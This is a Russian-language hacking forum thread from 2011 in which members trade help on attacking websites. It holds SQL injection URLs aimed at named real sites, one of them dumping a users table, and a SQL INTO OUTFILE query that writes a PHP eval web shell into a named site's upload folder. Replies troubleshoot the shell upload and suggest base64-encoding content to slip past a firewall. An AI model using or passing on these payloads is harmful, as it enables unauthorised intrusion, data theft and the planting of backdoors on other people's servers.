Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Да нет они там есть. я знаю точно. сейчас обосную.
    При запросе только по id без других параметров выводиться данные в таком порядке 0,6,9,19,20,22....
    пример
    --ttp://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,%28group_concat%28id%29%29,4,5+from+goldsauna.users+ORDER+BY+id+ASC+--+
    а при двойном запросе с добавлением name например,
    выводиться уже с позиции 166
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,419
    Likes Received:
    815
    Reputations:
    848
    а чем вас не устраивает limit?
    и с подобными вопросами наверное лудше было бы запостить в разделе по БД а не уязвимостей.
    _http://forum.antichat.ru/thread62769.html
     
    _________________________
  3. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    154
    Likes Received:
    18
    Reputations:
    9
    пытаюсь править индекс, вставляю код, нажимаю save сайт выдает

    что делать? есть ли шеллы использующие метод ГЕТ?
     
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    406
    Reputations:
    196
    Не поможет. Это обычный firewall так реагирует на левые данные в REQUEST запросах.

    Закодируй в base64 контент пост-запроса и запиши в файл уже раскодированный.
     
    1 person likes this.
  5. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Так же часто промежуточный сервер блокирует такие данные, в том числе и с большим объёмом.

    А вообще WSO постоянно использует POST(Шелл не работал бы вообще), а у GET длина ограничена(Не получиться передать нужный объём).
     
  6. crackforme

    crackforme New Member

    Joined:
    3 Oct 2011
    Messages:
    208
    Likes Received:
    1
    Reputations:
    0
    как залить шелл на ipb>3 ?
    доступ в админку есть
     
    #18186 crackforme, 31 Oct 2011
    Last edited: 31 Oct 2011
  7. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,158
    Likes Received:
    423
    Reputations:
    231
    http://forum.antichat.ru/threadnav89112-1-10.html
     
  8. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    _http://wero.ru/php/content.php?id=163' это sql иньекция?
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    да...
     
  10. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    В чем ошибка ?

    Code:
    select '<?php eval($_REQUEST[cmd]); ?>' from mysql.user into outfile '/var/www/uprgroup/data/www/upr-group.ru/images/uploads2/test.php'
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    через запрос в скуле? или через пыху заливаешь? файл_прив есть положительное? папка доступна для записи?
     
  12. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    В админке есть SQL-менеджер, папка есть, файл прив тоже.
     
  13. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    Может в том, что пыху не понятно, что такое cmd?
    $_REQUEST[cmd] - обращение к массиву по глобальной переменной или хз ещё чему, которой не существует. Кавычки в общем надо.
    from mysql.user - нужно убрать вообще
     
  14. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    Code:
    Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0, 100' at line 1
    
    Query: select 'test' from mysql.user into outfile '/var/data/www/site/images/test.php' LIMIT 0, 100
     
  15. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    154
    Likes Received:
    18
    Reputations:
    9
    http://www.pmrs.ps/last/etemplate.php?id=249%20and%201=1

    как такое крутить?
     
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    http://www.pmrs.ps/last/etemplate.php?id=-249+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20+


    вот так вот и надо...как обычную
     
    1 person likes this.
  17. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    154
    Likes Received:
    18
    Reputations:
    9
    ясно...
    смутило это:

     
  18. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Глупости, отработает и так
    Не всегда, только если mysql не старый.

    wkar у тебя файл не создаётся, варианта три:
    1 Нет прав на запись
    2 Нет прав на операции с файлами (файлприва тоесть)
    3 Путь не верный

    --------

    upd
    Этого не заметил :)

    А откуда лимит-то? Менеджер добавляет наверное? Так срежь его )
     
    #18198 KolosJey, 31 Oct 2011
    Last edited: 31 Oct 2011
    1 person likes this.
  19. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Разьясните пожалуста что здесь не так?
    Code:
    -ttp://www.site.xx/mesto.php?id=1+GROUP+BY+92+--+
    все ок 92
    далее ставлю
    -ttp://www.site.xx/mesto.php?id=1851+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92+--+
    ответ
    The used SELECT statements have a different number of columns
    и ошибка... union+select получается не работает?
     
    #18199 namez2, 31 Oct 2011
    Last edited: 1 Nov 2011
  20. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,158
    Likes Received:
    423
    Reputations:
    231
    ты когда +GROUP+BY+92+--+ ставишь, что тебя что открывается?
    если сам сайт, то пропробуй +GROUP+BY+95+--+
    там полей может быть больше 92
     
Loading...
Thread Status:
Not open for further replies.